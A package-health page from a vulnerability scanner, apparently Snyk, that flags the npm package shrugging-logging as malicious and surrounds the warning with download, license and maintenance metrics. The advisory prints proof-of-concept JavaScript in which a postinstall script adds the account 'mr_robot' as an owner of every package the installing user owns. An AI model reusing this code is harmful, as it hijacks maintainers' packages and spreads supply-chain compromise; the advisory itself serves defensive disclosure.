shrugging-logging

v0.0.1-security

security holding package For more information about how to use this package see README

Latest version published 7 years ago
License: Unknown

Ensure you're using the healthiest npm packages

Snyk scans all the packages in your projects for vulnerabilities and provides automated fix advice

This is a malicious package

shrugging-logging is a malicious package that uses postinstall scripts to perform malicious activity, like adding the owner of the malicious package as an owner to all packages owned by the user who performed npm install. This is especially dangerous in production runtime environments, where environment variables tend to consist of keys, passwords, tokens and other secrets. PoC: function currentUser(cb) { exec('npm whoami', function (err, stdout, stderr) { if (!err) cb(stdout); }); } function addOwner(packageName, newOwner) { exec('npm owner add ' + newOwner + ' ' + packageName); } function getModulesOwned(user, cb) { var url = 'https://www.npmjs.org/~' + user; request(url, function (error, response, body) { var $ = cheerio.load(body); var packages = $('.collaborated-packages a').map(function (i, el) { return $(this).text(); }).get(); cb(packages); }); } currentUser(function (user) { if (user) { getModulesOwned(user, function (modules) { modules.forEach(function (moduleName) { addOwner(moduleName, 'mr_robot'); }); }); } }); The list of packages and their scripts are: shrugging-logging test-module-a pandora-doomsday Avoid usage of this package altogether.

Security

Security issues found
All security vulnerabilities belong to production dependencies of direct and indirect packages.

Security and license risk for significant versions

All Versions
Version Vulnerabilities License Risk
0.0.1-security | 08/2017
Popular
  • 0
    H
  • 0
    M
  • 0
    L
License
Unknown
Alert

Unable to detect license

We couldn’t find an appropriate license for this project. It is highly advised to make sure the project license is compatible with your business needs before including it as a dependency, to keep yourself protected from infringement suits or loss of your own code.

Security Policy
No

Is your project affected by vulnerabilities?

Scan your projects for vulnerabilities. Fix quickly with automated fixes. Get started with Snyk for free.

Get started free

Popularity

Limited

Weekly Downloads (0)

Download trend
GitHub Stars
149
Forks
57
Contributors
5

Direct Usage Popularity


The npm package shrugging-logging receives a total of 0 downloads a week. As such, we scored shrugging-logging popularity level to be Limited.

Based on project statistics from the GitHub repository for the npm package shrugging-logging, we found that it has been starred 149 times.

Downloads are calculated as moving averages for a period of the last 12 months, excluding weekends and known missing data points.

Community

Limited
Readme.md
Yes
Contributing.md
No
Code of Conduct
No
Contributors
5
Funding
No

This project has seen only 10 or less contributors.

We found a way for you to contribute to the project! Looks like shrugging-logging is missing a Code of Conduct.

How about a good first contribution to this project? It seems that shrugging-logging is missing a LICENSE file.


Embed Package Health Score Badge

package health: 21/100 package health 21/100

Maintenance

Inactive

Commit Frequency

No Recent Commits
Open Issues
0
Open PR
5
Last Release
7 years ago
Last Commit
3 years ago

Further analysis of the maintenance status of shrugging-logging based on released npm versions cadence, the repository activity, and other data points determined that its maintenance is Inactive.

An important project maintenance signal to consider for shrugging-logging is that it hasn't seen any new versions released to npm in the past 12 months, and could be considered as a discontinued project, or that which receives low attention from its maintainers.

In the past month we didn't find any pull request activity or change in issues status has been detected for the GitHub repository.

Package

Node.js Compatibility
not defined

Age
8 years
Dependencies
0 Direct
Versions
16
Install Size
0 B
Dist-tags
1
# of Files
0
Maintainers
1
TS Typings
No

shrugging-logging has more than a single and default latest tag published for the npm package. This means, there may be other tags available for this package, such as next to indicate future releases, or stable to indicate stable releases.